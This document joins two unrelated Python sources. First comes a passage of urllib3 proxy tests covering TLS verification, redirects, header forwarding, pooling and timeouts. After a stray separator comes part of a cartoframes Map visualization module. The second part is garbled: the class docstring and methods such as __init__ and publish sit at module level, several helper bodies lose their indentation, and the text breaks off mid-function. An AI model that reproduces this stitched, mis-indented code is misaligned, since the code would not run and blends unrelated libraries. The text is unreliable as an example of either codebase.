            r = https.request("GET", f"{self.http_url}/")
            assert r.status == 200

    def test_https_proxy_with_proxy_ssl_context(self) -> None:
        """A custom proxy_ssl_context is used for the proxy TLS handshake."""
        proxy_ssl_context = create_urllib3_context()
        proxy_ssl_context.load_verify_locations(DEFAULT_CA)
        with proxy_from_url(
            self.https_proxy_url,
            proxy_ssl_context=proxy_ssl_context,
            ca_certs=DEFAULT_CA,
        ) as https:
            r = https.request("GET", f"{self.https_url}/")
            assert r.status == 200

            r = https.request("GET", f"{self.http_url}/")
            assert r.status == 200

    @withPyOpenSSL
    def test_https_proxy_pyopenssl_not_supported(self) -> None:
        """TLS-in-TLS through an HTTPS proxy is rejected under PyOpenSSL."""
        with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
            r = https.request("GET", f"{self.http_url}/")
            assert r.status == 200

            with pytest.raises(
                ProxySchemeUnsupported, match="isn't available on non-native SSLContext"
            ):
                https.request("GET", f"{self.https_url}/")

    @onlySecureTransport()
    def test_https_proxy_securetransport_not_supported(self) -> None:
        """TLS-in-TLS through an HTTPS proxy is rejected under SecureTransport."""
        with proxy_from_url(self.https_proxy_url, ca_certs=DEFAULT_CA) as https:
            r = https.request("GET", f"{self.http_url}/")
            assert r.status == 200

            with pytest.raises(
                ProxySchemeUnsupported, match="isn't available on non-native SSLContext"
            ):
                https.request("GET", f"{self.https_url}/")

    def test_https_proxy_forwarding_for_https(self) -> None:
        """use_forwarding_for_https makes HTTPS targets work via forwarding."""
        with proxy_from_url(
            self.https_proxy_url,
            ca_certs=DEFAULT_CA,
            use_forwarding_for_https=True,
        ) as https:
            r = https.request("GET", f"{self.http_url}/")
            assert r.status == 200

            r = https.request("GET", f"{self.https_url}/")
            assert r.status == 200

    def test_nagle_proxy(self) -> None:
        """Test that proxy connections do not have TCP_NODELAY turned on"""
        with ProxyManager(self.proxy_url) as http:
            hc2 = http.connection_from_host(self.http_host, self.http_port)
            conn = hc2._get_conn()
            try:
                hc2._make_request(conn, "GET", "/")
                tcp_nodelay_setting = conn.sock.getsockopt(
                    socket.IPPROTO_TCP, socket.TCP_NODELAY
                )
                assert tcp_nodelay_setting == 0, (
                    "Expected TCP_NODELAY for proxies to be set "
                    "to zero, instead was %s" % tcp_nodelay_setting
                )
            finally:
                conn.close()

    @pytest.mark.parametrize("proxy_scheme", ["http", "https"])
    @pytest.mark.parametrize("target_scheme", ["http", "https"])
    def test_proxy_conn_fail_from_dns(
        self, proxy_scheme: str, target_scheme: str
    ) -> None:
        """An unresolvable proxy host surfaces as ProxyError(NameResolutionError)."""
        host, port = get_unreachable_address()
        with proxy_from_url(
            f"{proxy_scheme}://{host}:{port}/", retries=1, timeout=LONG_TIMEOUT
        ) as http:
            if target_scheme == "https":
                target_url = self.https_url
            else:
                target_url = self.http_url
            with pytest.raises(MaxRetryError) as e:
                http.request("GET", f"{target_url}/")
            assert type(e.value.reason) == ProxyError
            assert (
                type(e.value.reason.original_error)
                == urllib3.exceptions.NameResolutionError
            )

    def test_oldapi(self) -> None:
        """Legacy usage: ProxyManager constructed from a connection pool."""
        with ProxyManager(
            connection_from_url(self.proxy_url), ca_certs=DEFAULT_CA  # type: ignore[arg-type]
        ) as http:
            r = http.request("GET", f"{self.http_url}/")
            assert r.status == 200

            r = http.request("GET", f"{self.https_url}/")
            assert r.status == 200

    def test_proxy_verified(self) -> None:
        """Certificate verification is applied to the tunneled HTTPS target."""
        # wrong CA: the handshake with the target must fail
        with proxy_from_url(
            self.proxy_url, cert_reqs="REQUIRED", ca_certs=self.bad_ca_path
        ) as http:
            https_pool = http._new_pool("https", self.https_host, self.https_port)
            with pytest.raises(MaxRetryError) as e:
                https_pool.request("GET", "/", retries=0)
            assert isinstance(e.value.reason, SSLError)
            assert (
                "certificate verify failed" in str(e.value.reason)
                # PyPy is more specific
                or "self signed certificate in certificate chain" in str(e.value.reason)
            ), f"Expected 'certificate verify failed', instead got: {e.value.reason!r}"

        # correct CA: request succeeds
        # NOTE(review): these two managers are not closed — presumably fine
        # for a test process, but a `with` block would be tidier.
        http = proxy_from_url(
            self.proxy_url, cert_reqs="REQUIRED", ca_certs=DEFAULT_CA
        )
        https_pool = http._new_pool("https", self.https_host, self.https_port)

        conn = https_pool._new_conn()
        assert conn.__class__ == VerifiedHTTPSConnection
        https_pool.request("GET", "/")  # Should succeed without exceptions.

        # correct CA but hostname mismatch: must fail verification
        http = proxy_from_url(
            self.proxy_url, cert_reqs="REQUIRED", ca_certs=DEFAULT_CA
        )
        https_fail_pool = http._new_pool("https", "127.0.0.1", self.https_port)

        with pytest.raises(
            MaxRetryError, match="doesn't match|IP address mismatch"
        ) as e:
            https_fail_pool.request("GET", "/", retries=0)
        assert isinstance(e.value.reason, SSLError)

    def test_redirect(self) -> None:
        """Same-host redirects are followed when redirect=True (the default)."""
        with proxy_from_url(self.proxy_url) as http:
            r = http.request(
                "GET",
                f"{self.http_url}/redirect",
                fields={"target": f"{self.http_url}/"},
                redirect=False,
            )

            assert r.status == 303

            r = http.request(
                "GET",
                f"{self.http_url}/redirect",
                fields={"target": f"{self.http_url}/"},
            )

            assert r.status == 200
            assert r.data == b"Dummy server!"

    def test_cross_host_redirect(self) -> None:
        """Cross-host redirects require retries; the pool host changes."""
        with proxy_from_url(self.proxy_url) as http:
            cross_host_location = f"{self.http_url_alt}/echo?a=b"
            with pytest.raises(MaxRetryError):
                http.request(
                    "GET",
                    f"{self.http_url}/redirect",
                    fields={"target": cross_host_location},
                    retries=0,
                )

            r = http.request(
                "GET",
                f"{self.http_url}/redirect",
                fields={"target": f"{self.http_url_alt}/echo?a=b"},
                retries=1,
            )
            assert isinstance(r, HTTPResponse)
            assert r._pool is not None
            assert r._pool.host != self.http_host_alt

    def test_cross_protocol_redirect(self) -> None:
        """HTTP→HTTPS redirects require retries; the pool switches protocol."""
        with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
            cross_protocol_location = f"{self.https_url}/echo?a=b"
            with pytest.raises(MaxRetryError):
                http.request(
                    "GET",
                    f"{self.http_url}/redirect",
                    fields={"target": cross_protocol_location},
                    retries=0,
                )

            r = http.request(
                "GET",
                f"{self.http_url}/redirect",
                fields={"target": f"{self.https_url}/echo?a=b"},
                retries=1,
            )
            assert isinstance(r, HTTPResponse)
            assert r._pool is not None
            assert r._pool.host == self.https_host

    def test_headers(self) -> None:
        """Default and proxy headers are sent correctly through an HTTP proxy.

        Proxy headers must only appear on forwarded (HTTP) requests, never on
        tunneled (HTTPS) requests; per-request headers replace the defaults.
        """
        with proxy_from_url(
            self.proxy_url,
            headers={"Foo": "bar"},
            proxy_headers={"Hickory": "dickory"},
            ca_certs=DEFAULT_CA,
        ) as http:
            r = http.request_encode_url("GET", f"{self.http_url}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"

            r = http.request_encode_url("GET", f"{self.http_url_alt}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert (
                returned_headers.get("Host") == f"{self.http_host_alt}:{self.http_port}"
            )

            r = http.request_encode_url("GET", f"{self.https_url}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") is None
            assert (
                returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
            )

            r = http.request_encode_body("POST", f"{self.http_url}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"

            r = http.request_encode_url(
                "GET", f"{self.http_url}/headers", headers={"Baz": "quux"}
            )
            returned_headers = r.json()
            assert returned_headers.get("Foo") is None
            assert returned_headers.get("Baz") == "quux"
            assert returned_headers.get("Hickory") == "dickory"
            assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"

            r = http.request_encode_url(
                "GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
            )
            returned_headers = r.json()
            assert returned_headers.get("Foo") is None
            assert returned_headers.get("Baz") == "quux"
            assert returned_headers.get("Hickory") is None
            assert (
                returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
            )

            r = http.request_encode_body(
                "GET", f"{self.http_url}/headers", headers={"Baz": "quux"}
            )
            returned_headers = r.json()
            assert returned_headers.get("Foo") is None
            assert returned_headers.get("Baz") == "quux"
            assert returned_headers.get("Hickory") == "dickory"
            assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"

            r = http.request_encode_body(
                "GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
            )
            returned_headers = r.json()
            assert returned_headers.get("Foo") is None
            assert returned_headers.get("Baz") == "quux"
            assert returned_headers.get("Hickory") is None
            assert (
                returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
            )

    def test_https_headers(self) -> None:
        """Header propagation works the same way through an HTTPS proxy."""
        with proxy_from_url(
            self.https_proxy_url,
            headers={"Foo": "bar"},
            proxy_headers={"Hickory": "dickory"},
            ca_certs=DEFAULT_CA,
        ) as http:
            r = http.request_encode_url("GET", f"{self.http_url}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert returned_headers.get("Host") == f"{self.http_host}:{self.http_port}"

            r = http.request_encode_url("GET", f"{self.http_url_alt}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert (
                returned_headers.get("Host") == f"{self.http_host_alt}:{self.http_port}"
            )

            r = http.request_encode_body(
                "GET", f"{self.https_url}/headers", headers={"Baz": "quux"}
            )
            returned_headers = r.json()
            assert returned_headers.get("Foo") is None
            assert returned_headers.get("Baz") == "quux"
            assert returned_headers.get("Hickory") is None
            assert (
                returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
            )

    def test_https_headers_forwarding_for_https(self) -> None:
        """Proxy headers ARE sent to HTTPS targets when forwarding is forced."""
        with proxy_from_url(
            self.https_proxy_url,
            headers={"Foo": "bar"},
            proxy_headers={"Hickory": "dickory"},
            ca_certs=DEFAULT_CA,
            use_forwarding_for_https=True,
        ) as http:
            r = http.request_encode_url("GET", f"{self.https_url}/headers")
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Hickory") == "dickory"
            assert (
                returned_headers.get("Host") == f"{self.https_host}:{self.https_port}"
            )

    def test_headerdict(self) -> None:
        """HTTPHeaderDict instances are accepted for every header argument."""
        default_headers = HTTPHeaderDict(a="b")
        proxy_headers = HTTPHeaderDict()
        proxy_headers.add("foo", "bar")

        with proxy_from_url(
            self.proxy_url, headers=default_headers, proxy_headers=proxy_headers
        ) as http:
            request_headers = HTTPHeaderDict(baz="quux")
            r = http.request("GET", f"{self.http_url}/headers", headers=request_headers)
            returned_headers = r.json()
            assert returned_headers.get("Foo") == "bar"
            assert returned_headers.get("Baz") == "quux"

    def test_proxy_pooling(self) -> None:
        """HTTP targets share one pool (the proxy); HTTPS targets get their own."""
        with proxy_from_url(self.proxy_url, cert_reqs="NONE") as http:
            for x in range(2):
                http.urlopen("GET", self.http_url)
            assert len(http.pools) == 1

            for x in range(2):
                http.urlopen("GET", self.http_url_alt)
            assert len(http.pools) == 1

            for x in range(2):
                http.urlopen("GET", self.https_url)
            assert len(http.pools) == 2

            for x in range(2):
                http.urlopen("GET", self.https_url_alt)
            assert len(http.pools) == 3

    def test_proxy_pooling_ext(self) -> None:
        """connection_from_url/host agree: HTTP pools collapse, HTTPS pools don't."""
        with proxy_from_url(self.proxy_url) as http:
            hc1 = http.connection_from_url(self.http_url)
            hc2 = http.connection_from_host(self.http_host, self.http_port)
            hc3 = http.connection_from_url(self.http_url_alt)
            hc4 = http.connection_from_host(self.http_host_alt, self.http_port)

            assert hc1 == hc2
            assert hc2 == hc3
            assert hc3 == hc4

            sc1 = http.connection_from_url(self.https_url)
            sc2 = http.connection_from_host(
                self.https_host, self.https_port, scheme="https"
            )
            sc3 = http.connection_from_url(self.https_url_alt)
            sc4 = http.connection_from_host(
                self.https_host_alt, self.https_port, scheme="https"
            )

            assert sc1 == sc2
            assert sc2 != sc3
            assert sc3 == sc4

    @requires_network()
    @pytest.mark.parametrize(
        ["proxy_scheme", "target_scheme", "use_forwarding_for_https"],
        [
            ("http", "http", False),
            ("https", "http", False),
            # 'use_forwarding_for_https' is only valid for HTTPS+HTTPS.
            ("https", "https", True),
        ],
    )
    def test_forwarding_proxy_request_timeout(
        self, proxy_scheme: str, target_scheme: str, use_forwarding_for_https: bool
    ) -> None:
        """A tarpit target behind a forwarding proxy yields ReadTimeoutError."""
        proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
        target_url = f"{target_scheme}://{TARPIT_HOST}"

        with proxy_from_url(
            proxy_url,
            ca_certs=DEFAULT_CA,
            use_forwarding_for_https=use_forwarding_for_https,
        ) as proxy:
            with pytest.raises(MaxRetryError) as e:
                timeout = Timeout(connect=LONG_TIMEOUT, read=SHORT_TIMEOUT)
                proxy.request("GET", target_url, timeout=timeout)

            # We sent the request to the proxy but didn't get any response
            # so we're not sure if that's being caused by the proxy or the
            # target so we put the blame on the target.
            assert type(e.value.reason) == ReadTimeoutError

    @requires_network()
    @pytest.mark.parametrize(
        ["proxy_scheme", "target_scheme"], [("http", "https"), ("https", "https")]
    )
    def test_tunneling_proxy_request_timeout(
        self, proxy_scheme: str, target_scheme: str
    ) -> None:
        """A tarpit target behind a tunneling proxy yields ReadTimeoutError."""
        proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
        target_url = f"{target_scheme}://{TARPIT_HOST}"

        with proxy_from_url(
            proxy_url,
            ca_certs=DEFAULT_CA,
        ) as proxy:
            with pytest.raises(MaxRetryError) as e:
                timeout = Timeout(connect=LONG_TIMEOUT, read=SHORT_TIMEOUT)
                proxy.request("GET", target_url, timeout=timeout)

            assert type(e.value.reason) == ReadTimeoutError

    @requires_network()
    @pytest.mark.parametrize(
        ["proxy_scheme", "target_scheme", "use_forwarding_for_https"],
        [
            ("http", "http", False),
            ("https", "http", False),
            # 'use_forwarding_for_https' is only valid for HTTPS+HTTPS.
            ("https", "https", True),
        ],
    )
    def test_forwarding_proxy_connect_timeout(
        self, proxy_scheme: str, target_scheme: str, use_forwarding_for_https: bool
    ) -> None:
        """An unreachable forwarding proxy yields ProxyError(ConnectTimeoutError)."""
        proxy_url = f"{proxy_scheme}://{TARPIT_HOST}"
        target_url = self.https_url if target_scheme == "https" else self.http_url

        with proxy_from_url(
            proxy_url, ca_certs=DEFAULT_CA, timeout=SHORT_TIMEOUT
        ) as proxy:
            with pytest.raises(MaxRetryError) as e:
                proxy.request("GET", target_url)

            assert type(e.value.reason) == ProxyError
            assert type(e.value.reason.original_error) == ConnectTimeoutError

    @requires_network()
    @pytest.mark.parametrize(
        ["proxy_scheme", "target_scheme"], [("http", "https"), ("https", "https")]
    )
    def test_tunneling_proxy_connect_timeout(
        self, proxy_scheme: str, target_scheme: str
    ) -> None:
        """An unreachable tunneling proxy yields ProxyError(ConnectTimeoutError)."""
        proxy_url = f"{proxy_scheme}://{TARPIT_HOST}"
        target_url = self.https_url if target_scheme == "https" else self.http_url

        with proxy_from_url(
            proxy_url, ca_certs=DEFAULT_CA, timeout=SHORT_TIMEOUT
        ) as proxy:
            with pytest.raises(MaxRetryError) as e:
                proxy.request("GET", target_url)

            assert type(e.value.reason) == ProxyError
            assert type(e.value.reason.original_error) == ConnectTimeoutError

    @requires_network()
    @pytest.mark.parametrize(
        ["target_scheme", "use_forwarding_for_https"],
        [
            ("http", False),
            ("https", False),
            ("https", True),
        ],
    )
    def test_https_proxy_tls_error(
        self, target_scheme: str, use_forwarding_for_https: str
    ) -> None:
        """A proxy TLS handshake failure surfaces as ProxyError(SSLError)."""
        target_url = self.https_url if target_scheme == "https" else self.http_url
        # default context does not trust the dummy proxy's CA
        proxy_ctx = ssl.create_default_context()
        with proxy_from_url(self.https_proxy_url, proxy_ssl_context=proxy_ctx) as proxy:
            with pytest.raises(MaxRetryError) as e:
                proxy.request("GET", target_url)
            assert type(e.value.reason) == ProxyError
            assert type(e.value.reason.original_error) == SSLError

    @requires_network()
    @pytest.mark.parametrize(
        ["proxy_scheme", "use_forwarding_for_https"],
        [
            ("http", False),
            ("https", False),
            ("https", True),
        ],
    )
    def test_proxy_https_target_tls_error(
        self, proxy_scheme: str, use_forwarding_for_https: str
    ) -> None:
        """A target TLS handshake failure surfaces as a plain SSLError."""
        proxy_url = self.https_proxy_url if proxy_scheme == "https" else self.proxy_url
        proxy_ctx = ssl.create_default_context()
        proxy_ctx.load_verify_locations(DEFAULT_CA)
        # target context does not trust the dummy server's CA
        ctx = ssl.create_default_context()

        with proxy_from_url(
            proxy_url, proxy_ssl_context=proxy_ctx, ssl_context=ctx
        ) as proxy:
            with pytest.raises(MaxRetryError) as e:
                proxy.request("GET", self.https_url)
            assert type(e.value.reason) == SSLError

    def test_scheme_host_case_insensitive(self) -> None:
        """Assert that upper-case schemes and hosts are normalized."""
        with proxy_from_url(self.proxy_url.upper(), ca_certs=DEFAULT_CA) as http:
            r = http.request("GET", f"{self.http_url.upper()}/")
            assert r.status == 200

            r = http.request("GET", f"{self.https_url.upper()}/")
            assert r.status == 200

    @pytest.mark.parametrize(
        "url, error_msg",
        [
            (
                "127.0.0.1",
                "Proxy URL had no scheme, should start with http:// or https://",
            ),
            (
                "localhost:8080",
                "Proxy URL had no scheme, should start with http:// or https://",
            ),
            (
                "ftp://google.com",
                "Proxy URL had unsupported scheme ftp, should use http:// or https://",
            ),
        ],
    )
    def test_invalid_schema(self, url: str, error_msg: str) -> None:
        """Scheme-less or unsupported proxy URLs raise ProxySchemeUnknown."""
        with pytest.raises(ProxySchemeUnknown, match=error_msg):
            proxy_from_url(url)
@pytest.mark.skipif(not HAS_IPV6, reason="Only runs on IPv6 systems")
class TestIPv6HTTPProxyManager(IPv6HTTPDummyProxyTestCase):
    """Basic proxying through a proxy reachable at an IPv6 address."""

    @classmethod
    def setup_class(cls) -> None:
        """Build URLs, with the proxy host bracketed as an IPv6 literal."""
        # NOTE(review): calls the plain HTTP base's setup_class directly
        # rather than super() — presumably deliberate so only the proxy URL
        # below uses the IPv6 host; confirm against the base classes.
        HTTPDummyProxyTestCase.setup_class()
        cls.http_url = f"http://{cls.http_host}:{int(cls.http_port)}"
        cls.http_url_alt = f"http://{cls.http_host_alt}:{int(cls.http_port)}"
        cls.https_url = f"https://{cls.https_host}:{int(cls.https_port)}"
        cls.https_url_alt = f"https://{cls.https_host_alt}:{int(cls.https_port)}"
        cls.proxy_url = f"http://[{cls.proxy_host}]:{int(cls.proxy_port)}"

    def test_basic_ipv6_proxy(self) -> None:
        """HTTP and HTTPS targets are reachable through the IPv6 proxy."""
        with proxy_from_url(self.proxy_url, ca_certs=DEFAULT_CA) as http:
            r = http.request("GET", f"{self.http_url}/")
            assert r.status == 200

            r = http.request("GET", f"{self.https_url}/")
            assert r.status == 200
| |
import collections
import numpy as np
from warnings import warn
from . import constants
from .html import HTMLMap
from .basemaps import Basemaps
from .kuviz import KuvizPublisher
from ..utils.utils import get_center, get_credentials
from ..utils.metrics import send_metrics
WORLD_BOUNDS = [[-180, -90], [180, 90]]
class Map:
"""Map to display a data visualization. It must contain a one or multiple :py:class:`Map <cartoframes.viz.Layer>`
instances. It provides control of the basemap, bounds and properties of the visualization.
Args:
layers (list of :py:class:`Layer <cartoframes.viz.Layer>`): List of
layers. Zero or more of :py:class:`Layer <cartoframes.viz.Layer>`.
basemap (str, optional):
- if a `str`, name of a CARTO vector basemap. One of `positron`,
`voyager`, or `darkmatter` from the :obj:`BaseMaps` class, or a
hex, rgb or named color value.
- if a `dict`, Mapbox or other style as the value of the `style` key.
If a Mapbox style, the access token is the value of the `token` key.
bounds (dict or list, optional): a dict with `west`, `south`, `east`, `north`
keys, or an array of floats in the following structure: [[west,
south], [east, north]]. If not provided the bounds will be automatically
calculated to fit all features.
size (tuple, optional): a (width, height) pair for the size of the map.
Default is (1024, 632).
viewport (dict, optional): Properties for display of the map viewport.
Keys can be `bearing` or `pitch`.
show_info (bool, optional): Whether to display center and zoom information in the
map or not. It is False by default.
is_static (bool, optional): Default False. If True, instead of showing and interactive
map, a png image will be displayed. Warning: UI components are not properly rendered in
the static view, we recommend to remove legends and widgets before rendering a static map.
theme (string, optional): Use a different UI theme (legends, widgets, popups). Available
themes are `dark` and `ligth`. By default, it is `light` for `Positron` and `Voyager`
basemaps and `dark` for `DarkMatter` basemap.
title (string, optional): Title to label the map. and will be displayed in the
default legend.
description (string, optional): Text that describes the map and will be displayed in the
default legend after the title.
Raises:
ValueError: if input parameters are not valid.
Examples:
Basic usage.
>>> Map(Layer('table in your account'))
Display more than one layer on a map.
>>> Map(layers=[
... Layer('table1'),
... Layer('table2')
>>> ])
Change the CARTO basemap style.
>>> Map(Layer('table in your account'), basemap=basemaps.darkmatter)
Choose a custom basemap style. Here we use the Mapbox streets style,
which requires an access token.
>>> basemap = {
... 'style': 'mapbox://styles/mapbox/streets-v9',
... 'token': 'your Mapbox token'
>>> }
>>> Map(Layer('table in your account'), basemap=basemap)
Remove basemap and show a custom color.
>>> Map(Layer('table in your account'), basemap='yellow') # None, False, 'white', 'rgb(255, 255, 0)'
Set custom bounds.
>>> bounds = {
... 'west': -10,
... 'east': 10,
... 'north': -10,
... 'south': 10
>>> } # or bounds = [[-10, 10], [10, -10]]
>>> Map(Layer('table in your account'), bounds=bounds)
Show the map center and zoom value on the map (lower left-hand corner).
>>> Map(Layer('table in your account'), show_info=True)
"""
def __init__(self,
             layers=None,
             basemap=Basemaps.positron,
             bounds=None,
             size=None,
             viewport=None,
             show_info=None,
             theme=None,
             title=None,
             description=None,
             is_static=None,
             layer_selector=False,
             **kwargs):
    """Initialize the map: store display options and derive layers, bounds,
    theme, token and basecolor from the given arguments."""
    self.layer_selector = layer_selector
    self.basemap = basemap
    self.size = size
    self.viewport = viewport
    self.title = title
    self.description = description
    self.show_info = show_info
    self.is_static = is_static
    # Layers receive a back-reference to this map (their UI state is reset).
    self.layers = _init_layers(layers, self)
    # Explicit bounds win; otherwise they are computed from the layers.
    self.bounds = _get_bounds(bounds, self.layers)
    self.theme = _get_theme(theme, basemap)
    self.token = get_token(basemap)
    self.basecolor = get_basecolor(basemap)
    # Private hooks to point at local copies of the JS bundles (tests/tools).
    self._carto_vl_path = kwargs.get('_carto_vl_path', None)
    self._airship_path = kwargs.get('_airship_path', None)
    self._publisher = None
    self._kuviz = None
    self.camera = None
    if viewport is not None:
        self.camera = {
            'center': get_center(viewport),
            'zoom': viewport.get('zoom'),
            'bearing': viewport.get('bearing'),
            'pitch': viewport.get('pitch')
        }
@send_metrics('map_created')
def _repr_html_(self):
    """Render the map as HTML for Jupyter display (also reports a usage metric)."""
    self._html_map = HTMLMap()

    self._html_map.set_content(
        layers=_get_layer_defs(self.layers),
        bounds=self.bounds,
        size=self.size,
        camera=self.camera,
        basemap=self.basemap,
        show_info=self.show_info,
        theme=self.theme,
        title=self.title,
        description=self.description,
        is_static=self.is_static,
        layer_selector=self.layer_selector,
        _carto_vl_path=self._carto_vl_path,
        _airship_path=self._airship_path)

    return self._html_map.html
def get_content(self):
    """Return the complete map state as a plain dict (layers serialized,
    plus flags telling whether any layer carries legends or widgets)."""
    layer_defs = _get_layer_defs(self.layers)

    has_legends = any(layer['legends'] for layer in layer_defs)
    has_widgets = any(len(layer['widgets']) != 0 for layer in layer_defs)

    return {
        'layers': layer_defs,
        'bounds': self.bounds,
        'size': self.size,
        'viewport': self.viewport,
        'camera': self.camera,
        'basemap': self.basemap,
        'basecolor': self.basecolor,
        'token': self.token,
        'show_info': self.show_info,
        'has_legends': has_legends,
        'has_widgets': has_widgets,
        'theme': self.theme,
        'title': self.title,
        'description': self.description,
        'is_static': self.is_static,
        'layer_selector': self.layer_selector,
        '_carto_vl_path': self._carto_vl_path,
        '_airship_path': self._airship_path
    }
@send_metrics('map_published')
def publish(self, name, password, credentials=None, if_exists='fail', maps_api_key=None):
    """Publish the map visualization as a CARTO custom visualization.

    Args:
        name (str): The visualization name on CARTO.
        password (str): By setting it, your visualization will be protected by
            password. When someone tries to show the visualization, the password
            will be requested. To disable password you must set it to None.
        credentials (:py:class:`Credentials <cartoframes.auth.Credentials>`, optional):
            A Credentials instance. If not provided, the credentials will be automatically
            obtained from the default credentials if available. It is used to create the
            publication and also to save local data (if exists) into your CARTO account.
        if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with
            the same name already exists in your account. Default is 'fail'.
        maps_api_key (str, optional): The Maps API key used for private datasets.

    Example:
        Publishing the map visualization.

        >>> tmap = Map(Layer('tablename'))
        >>> tmap.publish('Custom Map Title', password=None)
    """
    _credentials = get_credentials(credentials)
    # The publisher is kept on the instance so update_publication() can reuse it.
    self._publisher = _get_publisher(_credentials)
    self._publisher.set_layers(self.layers, maps_api_key)

    html = self._get_publication_html(name)
    return self._publisher.publish(html, name, password, if_exists)
def update_publication(self, name, password, if_exists='fail'):
    """Update the published map visualization.

    Args:
        name (str): The visualization name on CARTO.
        password (str): setting it your visualization will be protected by
            password and using `None` the visualization will be public.
        if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already
            exists in your account. Default is 'fail'.

    Raises:
        PublishError: if the map has not been published yet.
    """
    # NOTE(review): self._publisher is only assigned in publish(); calling this
    # first would hit a None publisher rather than the documented PublishError --
    # confirm the error is raised elsewhere (e.g. inside _get_publication_html).
    html = self._get_publication_html(name)
    return self._publisher.update(html, name, password, if_exists)
def _get_publication_html(self, name):
    """Render the standalone (embeddable) HTML document used for a publication.

    Differences from the notebook rendering: the published layers come from the
    publisher, the size/info overlays are disabled and is_embed is set.
    """
    html_map = HTMLMap('templates/viz/main.html.j2')
    html_map.set_content(
        layers=_get_layer_defs(self._publisher.get_layers()),
        bounds=self.bounds,
        size=None,
        camera=self.camera,
        basemap=self.basemap,
        show_info=False,
        theme=self.theme,
        title=name,
        description=self.description,
        is_static=self.is_static,
        is_embed=True,
        layer_selector=self.layer_selector,
        _carto_vl_path=self._carto_vl_path,
        _airship_path=self._airship_path)

    return html_map.html
def _get_publisher(credentials):
    """Build a KuvizPublisher bound to the given credentials."""
    return KuvizPublisher(credentials)
def _get_bounds(bounds, layers):
    """Return explicit bounds (normalized) or, when absent, bounds derived from the layers."""
    return _format_bounds(bounds) if bounds else _compute_bounds(layers)
def _init_layers(layers, parent_map):
if layers is None:
return []
if not isinstance(layers, collections.abc.Iterable):
layers.reset_ui(parent_map)
return [layers]
else:
for layer in layers:
layer.reset_ui(parent_map)
return layers
def _get_layer_defs(layers):
if layers is None:
return None
return list(map(_get_layer_def, layers))
def _get_layer_def(layer):
    # Delegate serialization to the layer object itself.
    return layer.get_layer_def()
def _format_bounds(bounds):
if bounds is None:
return WORLD_BOUNDS
if isinstance(bounds, list):
return _format_list_bounds(bounds)
elif isinstance(bounds, dict):
return _format_dict_bounds(bounds)
else:
raise ValueError('Bounds must be a list or a dict')
def _format_list_bounds(bounds):
if not (len(bounds) == 2 and len(bounds[0]) == 2 and len(bounds[1]) == 2):
raise ValueError('Bounds list must have exactly four values in the '
'order: [[west, south], [east, north]]')
return _clamp_and_format_bounds(
bounds[0][0],
bounds[0][1],
bounds[1][0],
bounds[1][1])
def _format_dict_bounds(bounds):
if 'west' not in bounds or 'south' not in bounds or \
'east' not in bounds or 'north' not in bounds:
raise ValueError('Bounds must have "west", "south", "east" and '
'"north" properties')
return _clamp_and_format_bounds(
bounds.get('west'),
bounds.get('east'),
bounds.get('south'),
bounds.get('north'))
def _clamp_and_format_bounds(west, south, east, north):
    """Clamp longitudes to [-180, 180] and latitudes to [-90, 90], keeping the
    [[west, south], [east, north]] output shape."""
    return [
        [_clamp(west, -180, 180), _clamp(south, -90, 90)],
        [_clamp(east, -180, 180), _clamp(north, -90, 90)]
    ]
def _clamp(value, minimum, maximum):
    # Clamp value into [minimum, maximum]; _conv2nan maps a None result to NaN.
    return _conv2nan(max(minimum, min(value, maximum)))
def _conv2nan(val):
"""convert Nones to np.nans"""
return np.nan if val is None else val
def _compute_bounds(layers):
    """Union the bounds of all layers into one [[west, south], [east, north]] box.

    With no layers the result is the formatted fallback (WORLD_BOUNDS).
    """
    seed = None
    if layers is not None and len(layers) > 0:
        seed = layers[0].bounds

    merged = _format_bounds(seed)

    for layer in layers[1:]:
        current = _format_bounds(layer.bounds)
        # Grow the box only when a layer extends past the current edge.
        if current[0][0] < merged[0][0]:
            merged[0][0] = current[0][0]
        if current[0][1] < merged[0][1]:
            merged[0][1] = current[0][1]
        if current[1][0] > merged[1][0]:
            merged[1][0] = current[1][0]
        if current[1][1] > merged[1][1]:
            merged[1][1] = current[1][1]

    return merged
def _get_theme(theme, basemap):
    """Validate an explicit UI theme, defaulting to 'dark' for the DarkMatter basemap."""
    if theme:
        if theme not in constants.THEMES:
            raise ValueError(
                'This theme is not valid. Valid themes types are: {}.'.format(
                    ', '.join(constants.THEMES)
                ))
        return theme
    if basemap == Basemaps.darkmatter:
        return 'dark'
    return theme
def get_token(basemap):
    """Return the access token from a custom basemap dict, or '' when absent."""
    if isinstance(basemap, dict) and 'token' in basemap:
        return basemap.get('token')
    return ''
def get_basecolor(basemap):
    """Return the background color used when no CARTO basemap style applies."""
    if basemap is None:
        return 'white'  # Default background when the basemap was removed.
    if isinstance(basemap, str):
        carto_styles = [Basemaps.voyager, Basemaps.positron, Basemaps.darkmatter]
        if basemap not in carto_styles:
            # A plain string that is not a CARTO style is treated as a color.
